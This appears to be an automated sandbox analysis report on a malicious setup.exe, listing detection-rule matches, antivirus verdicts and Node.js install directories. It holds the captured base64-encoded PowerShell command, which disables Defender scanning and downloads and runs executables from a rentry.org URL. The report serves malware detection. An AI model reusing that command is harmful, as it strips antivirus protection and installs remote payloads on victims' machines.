"PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFA
                        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2030.tmp\2031.tmp\2032.bat C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7496, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'", ProcessId: 4588, ProcessName: powershell.exe
                        Source: Process startedAuthor: Michael Haag: Data: Command: cscript.exe //Nologo C:\Users\user\AppData\Local\Programs\Steam\resources\app.asar.unpacked\node_modules\regedit\vbs\regList.wsf A HKCU\Software\Valve\Steam, CommandLine: cscript.exe //Nologo C:\Users\user\AppData\Local\Programs\Steam\resources\app.asar.unpacked\node_modules\regedit\vbs\regList.wsf A HKCU\Software\Valve\Steam, CommandLine|base64offset|contains: h(, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Programs\Steam\Steam.exe", ParentImage: C:\Users\user\AppData\Local\Programs\Steam\Steam.exe, ParentProcessId: 5144, ParentProcessName: Steam.exe, ProcessCommandLine: cscript.exe //Nologo C:\Users\user\AppData\Local\Programs\Steam\resources\app.asar.unpacked\node_modules\regedit\vbs\regList.wsf A HKCU\Software\Valve\Steam, ProcessId: 7908, ProcessName: cscript.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFA
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5924, ProcessName: svchost.exe
                        No Snort rule has matched

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: setup.exeAvira: detected
                        Source: setup.exeReversingLabs: Detection: 71%
                        Source: setup.exeVirustotal: Detection: 81%Perma Link
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
                        Source: setup.exeJoe Sandbox ML: detected
                        Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\corepack
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\corepack.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\install_tools.bat
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node.exe
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\nodevars.bat
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\npm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\npm.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\npx
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\npx.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\CHANGELOG.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\LICENSE.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\README.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\package.json
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist\corepack.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist\npm.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist\npx.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist\pnpm.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist\pnpx.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist\yarn.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist\yarnpkg.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist\lib
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist\lib\corepack.cjs
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\corepack
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\corepack.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\corepack.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\npm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\npm.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\npm.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\npx
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\npx.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\npx.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\pnpm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\pnpm.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\pnpm.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\pnpx
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\pnpx.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\pnpx.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\yarn
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\yarn.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\yarn.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\yarnpkg
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\yarnpkg.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\yarnpkg.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\corepack
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\corepack.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\corepack.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\npm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\npm.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\npm.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\npx
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\npx.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\npx.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\pnpm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\pnpm.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\pnpm.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\pnpx
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\pnpx.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\pnpx.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\yarn
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\yarn.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\yarn.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\yarnpkg
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\yarnpkg.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\yarnpkg.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\.npmrc
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\LICENSE
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\README.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\index.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\npmrc
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\package.json
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\npm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\npm-cli.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\npm.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\npm.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\npx
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\npx-cli.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\npx.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\npx.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\node-gyp-bin
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\node-gyp-bin\node-gyp
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\node-gyp-bin\node-gyp.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-access.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-adduser.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-audit.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-bugs.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-cache.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-ci.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-completion.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-config.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-dedupe.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-deprecate.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-diff.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-dist-tag.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-docs.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-doctor.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-edit.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-exec.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-explain.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-explore.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-find-dupes.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-fund.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-help-search.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-help.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-hook.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-init.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-install-ci-test.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-install-test.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-install.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-link.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-login.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-logout.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-ls.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-org.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-outdated.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-owner.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-pack.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-ping.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-pkg.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-prefix.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-profile.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-prune.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-publish.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-query.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-rebuild.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-repo.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-restart.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-root.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-run-script.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-sbom.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-search.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-shrinkwrap.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-star.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-stars.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-start.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-stop.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-team.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-test.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-token.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-uninstall.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-unpublish.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-unstar.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-update.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-version.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-view.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-whoami.md
